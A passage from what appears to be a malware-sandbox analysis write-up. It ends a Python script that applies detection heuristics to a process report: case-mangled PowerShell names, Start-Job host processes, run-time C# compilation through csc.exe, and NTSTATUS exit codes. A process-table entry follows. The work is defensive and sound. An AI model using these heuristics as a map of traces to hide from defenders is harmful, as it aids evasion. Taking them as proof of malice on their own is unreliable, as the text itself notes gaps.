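         "POWeRsHEll.exe", "MEDIUM", 0),
    Proc(3740, r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESF066.tmp" "c:\Users\admin\AppData\Local\Temp\CSC3501E91C22C04217AEF1B5C3DF308F7.TMP"',
         "csc.exe", "MEDIUM", 0),
    Proc(248, r'"C:\WINDOWS\system32\mmc.exe" "C:\WINDOWS\system32\taskschd.msc" /s', "", "MEDIUM", 3221226540),
]

# Assumption of this example: spellings a legitimate launcher produces. Any other mixed-case
# spelling of the PowerShell host is treated as deliberate case mangling by a script/macro.
ACCEPTED_SPELLINGS = {"powershell.exe", "PowerShell.exe", "POWERSHELL.EXE"}

# NTSTATUS values that surface as process exit codes; only the one this page shows is mapped.
NTSTATUS_NAMES = {0xC000042C: "STATUS_ELEVATION_REQUIRED"}

_FIRST_TOKEN = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')


def image_name(cmd: str) -> str:
    """File name of the executable from a command line, original case preserved.
    Works for the quoted form and for the NT-native \\??\\ prefix on the conhost.exe lines."""
    m = _FIRST_TOKEN.match(cmd)
    token = (m.group(1) or m.group(2)) if m else ""
    return token.rsplit("\\", 1)[-1]


def is_case_mangled(name: str) -> bool:
    """True when the PowerShell host is spelled in a mixed case no legitimate launcher uses."""
    return name.lower() == "powershell.exe" and name not in ACCEPTED_SPELLINGS


def is_job_host(cmd: str) -> bool:
    """'-Version <v> -s -NoLogo -NoProfile' is the child command line Start-Job produces
    (-s = server mode). A fact about PowerShell itself, not something the report states."""
    return re.search(r"-Version\s+\S+\s+-s\s+-NoLogo\s+-NoProfile", cmd, re.IGNORECASE) is not None


def is_runtime_compile(name: str, cmd: str, parent: str) -> bool:
    """csc.exe under a PowerShell host with /noconfig and an @response file in %TEMP% is the
    footprint of Add-Type / CodeDOM compiling C# at run time."""
    return (name.lower() == "csc.exe"
            and parent.lower() == "powershell.exe"
            and "/noconfig" in cmd.lower()
            and re.search(r'@"?[^"]*\\temp\\[^"]*\.cmdline', cmd, re.IGNORECASE) is not None)


def ntstatus(exit_code: int) -> str:
    """Render exit codes in the NTSTATUS error range (0xC0000000 and up) as hex plus a name."""
    if exit_code < 0xC0000000:
        return ""
    return f"0x{exit_code:08X} {NTSTATUS_NAMES.get(exit_code, 'unknown NTSTATUS')}"


def analyze(procs: List[Proc]) -> Dict[int, List[str]]:
    """Map each PID to its findings; an empty list means nothing in these rules fired."""
    findings: Dict[int, List[str]] = {}
    for p in procs:
        name = image_name(p.cmd)
        hits: List[str] = []
        if is_case_mangled(p.parent):
            hits.append(f"parent image name is case-mangled: {p.parent}")
        if is_case_mangled(name):
            hits.append(f"image name is case-mangled: {name}")
        if name.lower() == "powershell.exe" and is_job_host(p.cmd):
            hits.append("PowerShell job host (-s server mode): the parent script used Start-Job")
        if is_runtime_compile(name, p.cmd, p.parent):
            hits.append("csc.exe run-time compile under PowerShell (Add-Type/CodeDOM)")
        if name.lower() == "cvtres.exe" and p.parent.lower() == "csc.exe":
            hits.append("cvtres.exe spawned by csc.exe (resource step of the same compile)")
        status = ntstatus(p.exit_code)
        if status:
            hits.append(f"exit code {p.exit_code} = {status}")
        findings[p.pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in analyze(SAMPLE).items():
        print(pid, "-" if not hits else "; ".join(hits))
```

Because the report gives parent names rather than parent PIDs, the chain rule cannot prove that PID 3740's csc.exe parent is PID 1580; on a live host, key the same logic on parent PID from Sysmon event 1 or the equivalent EDR process-create record, and treat the conhost.exe children as noise (they carry no signal of their own, as their "No indicators" entries above reflect).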
PID
4756
CMD
"C:\WINDOWS\system32\mmc.exe" "C:\WINDOWS\system32\taskschd.msc" /s
Path
C:\WINDOWS\system32\mmc.exe
Indicators
Parent process
––
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation